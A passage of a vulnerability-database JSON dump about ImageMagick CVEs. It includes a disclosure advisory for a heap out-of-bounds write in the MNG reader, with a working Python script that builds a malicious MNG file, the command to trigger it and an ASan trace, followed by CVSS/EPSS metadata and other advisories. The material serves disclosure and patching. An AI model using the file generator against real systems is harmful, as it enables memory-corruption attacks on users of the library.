assumption is no longer true, and the calculation at \\[3\\] will end up with a `q` pointer outside the buffer bounds.\n\nThis issue leads to an out-of-bounds write of controlled data beyond the bounds of a heap allocation.\n\nTriggering this issue requires an `image` with large `columns` or `rows` (\\~65535) which should be prevented by all of the example security policies (which set `width`/`height` limits of `8KP`).\n\n## **Affected Version(s)**\n\nVerified on current HEAD (305e383c8ac7b30bc2ee96ab8c43ec96217ec2a9) and latest stable release (7.1.2-0).\n\n### **Build Instructions**\n\n```shell\ngit clone https://github.com/imagemagick/imagemagick\ncd imagemagick\n\nexport CC=clang\nexport CXX=clang++\nexport CFLAGS=\"-fsanitize=address\"\nexport CXXFLAGS=\"-fsanitize=address\"\nexport LDFLAGS=\"-fsanitize=address\"\n\n./configure --disable-shared --disable-docs --with-jxl\nmake -j\n```\n\n## **Reproduction**\n\n### **Test Case**\n\nThis testcase is a python script that will generate an MNG file with a MAGN chunk that triggers this overflow leading to an out-of-bounds heap write.\n\n```\nimport struct\nimport zlib\n\ndef create_chunk(chunk_type, data):\n crc = zlib.crc32(chunk_type + data) & 0xFFFFFFFF\n return struct.pack('>I', len(data)) + chunk_type + data + struct.pack('>I', crc)\n\n# MNG signature\nmng_signature = b'\\x8aMNG\\r\\n\\x1a\\n'\n\n# --- Dimensions ---\nmhdr_width = 1\nmhdr_height = 1\nihdr_width = 65538 # W: Original width to cause W' overflow\nihdr_height = 1 # H: Original height\n\n# MHDR chunk (Valid small dimensions)\nmhdr_data = struct.pack('>IIIIIII', mhdr_width, mhdr_height, 1, 0, 0, 0, 0)\nmhdr_chunk = create_chunk(b'MHDR', mhdr_data)\n\n# MAGN chunk: Trigger width overflow, force entry via height magn\nmagn_first = 0\nmagn_last = 0\nmagn_methx = 1\nmagn_mx = 65535 # -> magnified_width = 65534 (overflow)\nmagn_my = 2 # -> magnified_height = 2 (magn_mt=2)\nmagn_ml = 65535\nmagn_mr = 65535\nmagn_mt = 2 # Force magnified_height > H (necessary to trigger large_image path)\nmagn_mb = 1\nmagn_methy = 1\n\nmagn_data = struct.pack('>HHBHHHHHHB',\n magn_first, magn_last,\n magn_methx,\n magn_mx, magn_my,\n magn_ml, magn_mr,\n magn_mt, magn_mb,\n magn_methy)\nmagn_chunk = create_chunk(b'MAGN', magn_data)\n\n# IHDR chunk\nihdr_data = struct.pack('>IIBBBBB', ihdr_width, ihdr_height, 8, 0, 0, 0, 0)\nihdr_chunk = create_chunk(b'IHDR', ihdr_data)\n\n# IDAT chunk (Minimal data for W x H grayscale pixels)\nscanline = b'\\x00' + (b'\\x00' * ihdr_width)\ncompressed_scanline = zlib.compress(scanline)\nidat_chunk = create_chunk(b'IDAT', compressed_scanline)\n\n# IEND chunk\niend_chunk = create_chunk(b'IEND', b'')\n\n# MEND chunk\nmend_chunk = create_chunk(b'MEND', b'')\n\nprogram_input = (\n mng_signature +\n mhdr_chunk +\n magn_chunk +\n ihdr_chunk +\n idat_chunk +\n iend_chunk +\n mend_chunk\n)\n\nprint(f\"Generated MNG size: {len(program_input)} bytes\")\nwith open(\"magn_write.mng\", \"wb\") as tmp:\n tmp.write(program_input)\n```\n\n### **Command**\n\n```shell\npython3 ./generate_testcase.py\nutilities/magick ./magn_write.mng -resize 200x200 PNG:output.png\n```\n\n### **ASan Backtrace**\n\n```\n=================================================================\n==585863==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f80849757d0 at pc 0x55744124fba3 bp 0x7fff1300ddf0 sp 0x7fff1300dde8\nWRITE of size 4 at 0x7f80849757d0 thread T0\n #0 0x55744124fba2 in SetPixelRed /tmp/repro/imagemagick/./MagickCore/pixel-accessor.h:913:52\n #1 0x55744123be16 in ReadOneMNGImage /tmp/repro/imagemagick/coders/png.c:6657:27\n #2 0x557441222c33 in ReadMNGImage /tmp/repro/imagemagick/coders/png.c:7341:9\n #3 0x557441347da1 in ReadImage /tmp/repro/imagemagick/MagickCore/constitute.c:736:15\n #4 0x55744134ad96 in ReadImages /tmp/repro/imagemagick/MagickCore/constitute.c:1078:9\n #5 0x5574419135fc in CLINoImageOperator /tmp/repro/imagemagick/MagickWand/operation.c:4959:22\n #6 0x55744190748c in CLIOption /tmp/repro/imagemagick/MagickWand/operation.c:5473:7\n #7 0x5574417dd25b in ProcessCommandOptions /tmp/repro/imagemagick/MagickWand/magick-cli.c:653:13\n #8 0x5574417de629 in MagickImageCommand /tmp/repro/imagemagick/MagickWand/magick-cli.c:1392:5\n #9 0x5574417daf9c in MagickCommandGenesis /tmp/repro/imagemagick/MagickWand/magick-cli.c:177:14\n #10 0x557440e237b9 in MagickMain /tmp/repro/imagemagick/utilities/magick.c:162:10\n #11 0x557440e231e1 in main /tmp/repro/imagemagick/utilities/magick.c:193:10\n #12 0x7f8087433ca7 in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16\n #13 0x7f8087433d64 in __libc_start_main csu/../csu/libc-start.c:360:3\n #14 0x557440d3f790 in _start (/tmp/repro/imagemagick/utilities/magick+0x1f2790) (BuildId: 926b2c12732f27a214dada191ea6277c7b553ea5)\n\n0x7f80849757d0 is located 48 bytes before 1572816-byte region [0x7f8084975800,0x7f8084af57d0)\nallocated by thread T0 here:\n #0 0x557440de00cb in posix_memalign (/tmp/repro/imagemagick/utilities/magick+0x2930cb) (BuildId: 926b2c12732f27a214dada191ea6277c7b553ea5)\n #1 0x557440e58aa6 in AcquireAlignedMemory_POSIX /tmp/repro/imagemagick/MagickCore/memory.c:300:7\n #2 0x557440e5885d in AcquireAlignedMemory /tmp/repro/imagemagick/MagickCore/memory.c:378:10\n #3 0x5574412e9725 in OpenPixelCache /tmp/repro/imagemagick/MagickCore/cache.c:3775:46\n #4 0x5574412eead7 in GetImagePixelCache /tmp/repro/imagemagick/MagickCore/cache.c:1782:18\n #5 0x5574412ef71b in SyncImagePixelCache /tmp/repro/imagemagick/MagickCore/cache.c:5600:28\n #6 0x557440e2e786 in SetImageStorageClass /tmp/repro/imagemagick/MagickCore/image.c:2617:10\n #7 0x557440e2f075 in SetImageBackgroundColor /tmp/repro/imagemagick/MagickCore/image.c:2422:7\n #8 0x55744123b3d6 in ReadOneMNGImage /tmp/repro/imagemagick/coders/png.c:6560:28\n #9 0x557441222c33 in ReadMNGImage /tmp/repro/imagemagick/coders/png.c:7341:9\n #10 0x557441347da1 in ReadImage /tmp/repro/imagemagick/MagickCore/constitute.c:736:15\n #11 0x55744134ad96 in ReadImages /tmp/repro/imagemagick/MagickCore/constitute.c:1078:9\n #12 0x5574419135fc in CLINoImageOperator /tmp/repro/imagemagick/MagickWand/operation.c:4959:22\n #13 0x55744190748c in CLIOption /tmp/repro/imagemagick/MagickWand/operation.c:5473:7\n #14 0x5574417dd25b in ProcessCommandOptions /tmp/repro/imagemagick/MagickWand/magick-cli.c:653:13\n #15 0x5574417de629 in MagickImageCommand /tmp/repro/imagemagick/MagickWand/magick-cli.c:1392:5\n #16 0x5574417daf9c in MagickCommandGenesis /tmp/repro/imagemagick/MagickWand/magick-cli.c:177:14\n #17 0x557440e237b9 in MagickMain /tmp/repro/imagemagick/utilities/magick.c:162:10\n #18 0x557440e231e1 in main /tmp/repro/imagemagick/utilities/magick.c:193:10\n #19 0x7f8087433ca7 in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16\n\nSUMMARY: AddressSanitizer: heap-buffer-overflow /tmp/repro/imagemagick/./MagickCore/pixel-accessor.h:913:52 in SetPixelRed\nShadow bytes around the buggy address:\n 0x7f8084975500: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x7f8084975580: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x7f8084975600: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x7f8084975680: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x7f8084975700: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n=>0x7f8084975780: fa fa fa fa fa fa fa fa fa fa[fa]fa fa fa fa fa\n 0x7f8084975800: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x7f8084975880: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x7f8084975900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x7f8084975980: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x7f8084975a00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\nShadow byte legend (one shadow byte represents 8 application bytes):\n Addressable: 00\n Partially addressable: 01 02 03 04 05 06 07 \n Heap left redzone: fa\n Freed heap region: fd\n Stack left redzone: f1\n Stack mid redzone: f2\n Stack right redzone: f3\n Stack after return: f5\n Stack use after scope: f8\n Global redzone: f9\n Global init order: f6\n Poisoned by user: f7\n Container overflow: fc\n Array cookie: ac\n Intra object redzone: bb\n ASan internal: fe\n Left alloca redzone: ca\n Right alloca redzone: cb\n==585863==ABORTING\n```\n\n## **Reporter Credit**\n\nGoogle Big Sleep", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-55154.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-55154.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-55154", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00053", "scoring_system": "epss", "scoring_elements": "0.16871", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00053", "scoring_system": "epss", "scoring_elements": "0.16609", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00053", "scoring_system": "epss", "scoring_elements": "0.16672", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00053", "scoring_system": "epss", "scoring_elements": "0.1673", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00053", "scoring_system": "epss", "scoring_elements": "0.16773", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00053", "scoring_system": "epss", "scoring_elements": "0.16795", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00053", "scoring_system": "epss", "scoring_elements": "0.16814", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00053", "scoring_system": "epss", "scoring_elements": "0.16741", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00053", "scoring_system": "epss", "scoring_elements": "0.16656", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00054", "scoring_system": "epss", "scoring_elements": "0.16987", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00054", "scoring_system": "epss", "scoring_elements": "0.16949", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00054", "scoring_system": "epss", "scoring_elements": "0.1689", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-55154" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-55154", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-55154" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.8.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.8.0" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-qp29-wxp5-wh82", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-08-13T14:28:13Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-qp29-wxp5-wh82" }, { "reference_url": "https://issuetracker.google.com/savedsearches/7155917", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://issuetracker.google.com/savedsearches/7155917" }, { "reference_url": "https://lists.debian.org/debian-lts-announce/2025/09/msg00012.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://lists.debian.org/debian-lts-announce/2025/09/msg00012.html" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55154", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55154" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1111103", "reference_id": "1111103", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1111103" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2388243", "reference_id": "2388243", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2388243" }, { "reference_url": "https://github.com/advisories/GHSA-qp29-wxp5-wh82", "reference_id": "GHSA-qp29-wxp5-wh82", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-qp29-wxp5-wh82" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:15666", "reference_id": "RHSA-2025:15666", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:15666" }, { "reference_url": "https://usn.ubuntu.com/7756-1/", "reference_id": "USN-7756-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7756-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" } ], "aliases": [ "CVE-2025-55154", "GHSA-qp29-wxp5-wh82" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ef36-52cx-dfg5" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/351742?format=api", "vulnerability_id": "VCID-egwu-28fp-dye6", "summary": "ImageMagick: ImageMagick: Denial of service via out-of-bounds read in -sample operation", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33905.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.0", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33905.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33905", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00012", "scoring_system": "epss", "scoring_elements": "0.01529", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00012", "scoring_system": "epss", "scoring_elements": "0.01762", "published_at": "2026-04-18T12:55:00Z" }, { "value": "5e-05", "scoring_system": "epss", "scoring_elements": "0.00246", "published_at": "2026-04-21T12:55:00Z" }, { "value": "5e-05", "scoring_system": "epss", "scoring_elements": "0.00245", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33905" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-33905", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-33905" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.12.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-16T13:22:18Z/" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.12.0" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/cca607366fb38c2dde019a9088b8415ffba3a835", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-16T13:22:18Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/cca607366fb38c2dde019a9088b8415ffba3a835" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/releases/tag/7.1.2-19", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-16T13:22:18Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/releases/tag/7.1.2-19" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-pcvx-ph33-r5vv", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-16T13:22:18Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-pcvx-ph33-r5vv" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33905", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33905" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458055", "reference_id": "2458055", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458055" }, { "reference_url": "https://github.com/advisories/GHSA-pcvx-ph33-r5vv", "reference_id": "GHSA-pcvx-ph33-r5vv", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-pcvx-ph33-r5vv" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1068118?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u8", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u8" }, { "url": "http://public2.vulnerablecode.io/api/packages/1054646?format=api", "purl": "pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u7", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u7" }, { "url": "http://public2.vulnerablecode.io/api/packages/1068084?format=api", "purl": "pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1" } ], "aliases": [ "CVE-2026-33905", "GHSA-pcvx-ph33-r5vv" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-egwu-28fp-dye6" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/21243?format=api", "vulnerability_id": "VCID-emmr-15qp-vfah", "summary": "ImageMagick has Global Buffer Overflow (OOB Read) via Negative Pixel Index in UIL and XPM Writer\nThe UIL and XPM image encoder do not validate the pixel index value returned by `GetPixelIndex()` before using it as an array subscript. In HDRI builds, `Quantum` is a floating-point type, so pixel index values can be negative. An attacker can craft an image with negative pixel index values to trigger a global buffer overflow read during conversion, leading to information disclosure or a process crash.\n\n```\nREAD of size 1 at 0x55a8823a776e thread T0\n #0 0x55a880d01e85 in WriteUILImage coders/uil.c:355\n```\n\n```\nREAD of size 1 at 0x55fa1c04c66e thread T0\n #0 0x55fa1a9ee415 in WriteXPMImage coders/xpm.c:1135\n```", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25898.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25898.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25898", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05734", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.057", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05535", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05526", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05579", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05586", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05596", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05624", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.056", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05562", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05563", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00058", "scoring_system": "epss", "scoring_elements": "0.18459", "published_at": "2026-04-02T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25898" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25898", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25898" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/c9c87dbaba56bf82aebd3392e11f0ffd93709b12", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/c9c87dbaba56bf82aebd3392e11f0ffd93709b12" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-vpxv-r9pg-7gpr", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", 